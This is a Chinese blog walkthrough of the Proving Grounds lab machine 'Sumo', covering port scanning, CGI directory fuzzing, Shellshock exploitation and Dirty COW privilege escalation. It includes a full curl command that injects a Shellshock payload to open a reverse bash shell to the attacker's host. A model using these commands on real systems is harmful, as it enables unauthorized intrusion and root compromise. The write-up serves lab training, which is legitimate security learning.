PG::Sumo

最新推荐文章于 2024-11-09 07:45:36 发布
最新推荐文章于 2024-11-09 07:45:36 发布
阅读量420 收藏
点赞数
分类专栏: PROVING GROUNDS 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46743202/article/details/128342673
版权

nmap -Pn -p- -T4 --min-rate=1000 192.168.170.87
image.png
nmap -Pn -p 22,80 -sCV 192.168.170.87
image.png
查看80端口的页面,没有什么有用的信息
image.png
尝试路径爆破,发现了/cgi-bin目录,就想到了HTB中的Shocker靶机。
image.png
继续爆破
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://192.168.170.87/cgi-bin/FUZZ.sh
image.png
image.png
通过爆破出的信息,进一步确认有Shellshock漏洞
参考 https://en.wikipedia.org/wiki/Shellshock_(software_bug)
尝试反弹shell

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.49.170/4444 0>&1'" http://192.168.170.87/cgi-bin/test.sh

image.png
上传linpeas脚本进行枚举
image.png
发现了可能利用的地方
image.png
内核版本很低,直接使用脏牛提权
https://www.exploit-db.com/raw/40839
下载文件至本地,并上传至靶机编译执行
image.png
编译时会遇到报“ld”的错误,设置路径变量就可以解决
export PATH=$PATH:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin

image.png
尝试su firefart,但是报错了,所以直接ssh登录。
image.png

aya3t
关注
专栏目录
PowerDesigner 数据库建模使用详解
congge
07-12 6088
PowerDesigner 数据库建模使用详解
sumo_db_pgsql:用于sumo_db的PostgreSQL适配器
05-16
sumo_db_pgsql 关于 这是的适配器。 PosgreSQL 安装PostgreSQL 要安装PostgreSQL,请按照以下链接中的说明进行操作: 。 入门 要开始使用sumo_db这个PostgreSQL适配器sumo_db_pgsql是很容易的,你只需要按照以下步骤操作: 将sumo_db和sumo_db_pgsql添加为项目中的依赖项。 使用Rebar3 : { deps , [ { sumo_db_pgsql , " 0.1.1 " } ]}. 您至少需要一个文档/实体,让我们以为例。 注意:如果您使用此实体,则需要将mixer包括在依赖项列表中 提供配置文件,例如: 。 现在,您可以运行您的应用并从那里开始使用sumo 。 从Erlang控制台运行sumo 启动Erlang控制台,将路径添加到梁和配置文件 $ REBAR_PROFILE=test
SQL学习指南:SQL和大数据
人邮异步社区
04-07 1404
由于SQL被数百万的人使用并且被集成到数千的应用程序中,因此利用SQL来处理这些数据是有意义的。在过去的几年里,涌现出了一批新的工具以支持SQL访问结构化、半结构化和非结构化的数据,这些工具包括Presto、Apache Drill和Toad Data Point等。本章探讨了其中之一的Apache Drill,用于演示如何将存储在不同服务器上格式各异的数据汇集起来用于报告和分析。 18.1 Apache Drill简介 目前已经开发出了各种工具和接口以供SQL访问存储在Hadoop、NoSQL、Spa
MySQL 三种关联查询的方式: ON vs USING vs 传统风格
蒜蓉粉丝蒸扇贝的专栏
03-12 1971
看看下面三个关联查询的 SQL 语句有何区别? SELECT * FROM film JOIN film_actor ON (film.film_id = film_actor.film_id) SELECT * FROM film JOIN film_actor USING (film_id) SELECT * FROM film, film_actor WHERE film.film_id...
【论文笔记】通过强化学习优化交通灯管理:交通状态无关智能体与具有当前 V2I 交通状态知识的整体智能体
wjt_0167的博客
12-26 1172
本文将当前交通灯控制分为两类:是否利用当前交通状态知识(接近十字路口的车辆位置和速度),针对这一点进行了详细实验比较;利用当前交通状态知识的整体系统在交通信号控制问题下,大幅提高了平均车速和流量,同时在多个指标取得优势
【论文笔记】IntelliLight智能交通灯:一种基于强化学习的智能交通信号灯控制方法
wjt_0167的博客
10-18 3810
使用深度强化学习技术来进行交通灯控制是一个新兴的趋势,其最近的研究也展现出一些具有前景的结果。然而,现有的研究还没有在现实世界的交通数据上测试其方法,他们只专注于研究奖励而没有解释政策。在本文中,我们提出了一个更有效的深度强化学习模型的交通灯控制。我们在基于监控摄像头获取的一个大规模的真实的交通数据集上测试了我们的方法。我们还展示了一些有趣的从真实数据中学习到的案例研究策略。
MySQL关联查询不加using_MySQL三种关联查询的方式:ONvsUSINGvs传统风格
weixin_36373860的博客
02-03 144
在 FROM 短语中列出了关联的表名,而 WHERE 短语则指定如何关联。这种写法被认为是古老的方式,有些时候比较难以理解,请看下面查看看下面三个关联查询的 SQL 语句有何区别?SELECT * FROM film JOIN film_actor ON (film.film_id = film_actor.film_id)SELECT * FROM film JOIN film_actor US...
Traffic light control using deep policy-gradient and value-function-based reinforcement learning
我的python学习笔记
03-08 1540
ISSN 1751-956X 等级:IET Intelligent Transport Systems 交通科学,技术 三区 作者:Seyed Sajad Mousavi1 , Michael Schukat1, Enda Howley Abstract: Recent advances in combining deep neural network architectures with reinforcement learning (RL) techniques have shown prom.
MySQL关联查询不加using_MySQL 三种关联查询的方式: ON vs USING vs 传统风格
weixin_29322553的博客
02-05 86
看看下面三个关联查询的 SQL 语句有何区别?SELECT * FROM film JOIN film_actor ON (film.film_id = film_actor.film_id)SELECT * FROM film JOIN film_actor USING (film_id)SELECT * FROM film, film_actor WHERE film.film_id = fi...
dump分析方法
weixin_43431593的博客
02-06 9817
在计算机领域中,术语“dump”通常用来指代将某种数据以某种格式进行转储或导出的过程。内存转储(Memory Dump):在计算机系统崩溃或发生故障时,操作系统可能会将系统的内存内容转储到磁盘上,以便后续分析。这样的转储文件通常被称为“内存转储”或“核心转储”,它包含了在系统崩溃时内存中的数据和状态信息。数据转储(Data Dump):在软件开发或调试过程中,程序员可能会将某些数据以某种格式导出到文件中,以便进行分析或调试。
数据库日志分析与故障排除:快速定位和解决数据库问题
!...# 1. 数据库日志基础** 数据库日志是记录数据库活动和事件的详细记录。它对于故障排除、性能分析和安全审计至关重要。 数据库日志通常包含以下信息: ...- **时间戳:**记录事件发生的时间。...- **日志级别:**指示...
图书管理系统性能优化与故障排除:提升系统效率的7个技巧
!...# 1. 图书管理系统性能优化概述** 图书管理系统是图书馆信息化建设的核心,其性能直接影响图书馆的服务质量。随着图书馆馆藏规模的不断扩大和用户数量的不断增加,图书管理系统的性能优化变得尤为重要。...
【优化覆盖】粒子群算法优化无人机编队布局求解车载网络通信覆盖优化问题【含Matlab源码 2021期】
Matlab领域的博客
02-17 87
粒子群算法优化无人机编队布局求解车载网络通信覆盖优化问题 完整的代码,方可运行;可提供运行操作视频!适合小白!
强化学习论文笔记 (2)
weixin_47560863的博客
03-02 784
IMPALA 参考网站: 1 Curriculum Learning 概述: 藉由拓扑式的课程设计(可视为数据集的选取)、提升模型效果与收敛速度并增强泛化能力 相关工作 continuation_method (没有理论收敛保证、但实际通常可用) : 欲优化参数集CCC、首先优化Cλ=0(θ)C_{\lambda=0}(\theta)Cλ=0​(θ)、接着逐渐增加难度λ\lambdaλ到Cλ=1(θ)C_{\lambda=1}(\theta)Cλ=1​(θ),其间确保θ\thetaθ取值使得CλC_
PHP常用的安全函数作用
sheji888的专栏
11-06 560
这些函数和方法有助于提升PHP应用的安全性,但安全是一个综合性的问题,需要综合使用多种手段,如输入验证、输出编码、会话管理、错误处理等。在PHP开发中,安全是非常重要的一个方面。
【销帮帮-注册_登录安全分析报告-试用页面存在安全隐患】
最新发布
weixin_46641057的博客
11-09 883
杭州逍邦网络科技有限公司成立于2015年,是国内一线CRM品牌和企服领域知名品牌。致力为客户提供专业的客户全生命周期管理和数字化销售管理服务,助力企业提升业绩,让企业更成功。销帮帮拥有强大而灵活的“PaaS+低代码”能力。在吸取了同行滑动验证码的经验后,自己研发了独特风格的那个验证码, 从逆向代码来看, 不仅借鉴了同行的技术原理,还在防抓取上下了功夫,防模拟器鼠标,物理鼠标和逻辑鼠标定位不一致判断措施,解决思路为让JS 这部分代码失效或这采用 物理定位鼠标的部分,目前采用的是物理鼠标的方式。
利用城市安全监测系统,筑牢自然灾害防线
njysiot的博客
11-06 258
对于洪水灾害,城市安全监测系统可以通过水位传感器、雨量传感器等设备,实时监测河流、湖泊和城市排水系统的水位变化以及降雨量。此外,系统还可以对城市的地下管网进行监测,及时发现管道堵塞和泄漏等问题,防止城市内涝的发生。在应对地震灾害方面,城市安全监测系统中的地震监测传感器可以实时捕捉地壳的微小震动,通过数据分析提前预测地震的发生。同时,系统还可以对建筑物的结构进行实时监测,评估地震对建筑物的影响,为后续的救援和重建工作提供重要依据。同时,还需要加强部门之间的协作和信息共享,形成应对自然灾害的合力。
加固筑牢安全防线:多源威胁检测响应在企业网络安全运营中的核心作用
安胜ANSCEN的博客
11-06 629
星盾”多源威胁检测响应平台,一款基于XDR理念的一站式安全运营平台,由长年实战对抗中形成的攻防知识经验指导设计,结合大数据、大模型与安全编排自动化响应技术,提供全局监测预警、自动化研判、智能响应、联防联控等能力,体系化提升全局态势感知和主动防御能力,规范化安全运营协同管理工作。传统威胁检测技术与单一检测技术均存在明显的局限性,为了提升网络安全防护能力,企业需要采用更加全面和多元化的威胁检测与响应策略,包括整合多种检测技术、引入智能化分析引擎、加强安全监控和预警能力等方面的工作。
漏洞与攻击技术详解
QQ_778132974的博客
11-06 608
一、漏洞的定义与分类漏洞是指在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,这些缺陷使得攻击者能够在未授权的情况下访问或破坏系统。漏洞可以按照不同的标准进行分类,如:按照类型分类:缓冲区溢出漏洞:由于程序在处理输入时没有进行足够的边界检查,导致输入的数据超出了缓冲区的大小,从而覆盖了相邻的内存区域,造成程序崩溃或执行恶意代码。提权漏洞:攻击者利用系统中的某些缺陷,提升自己的权限,从而能够执行更高权限的操作。随着攻击技术的不断进步,攻击者能够利用更多的漏洞来执行攻击,从而给网络安全带来更大的威胁。
SUMO:城市交通微观仿真平台详解及使用指南
SUMO提供了一系列应用程序,包括Activitygen、Dfrouter、Duarouter、Jtrrouter、Netgen、Netconvert、Od2trips、Polyconvert、Sumo、Sumo-gui和TraCITestClient等,用于路网生成、需求模拟、路径计算和实际仿真等。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值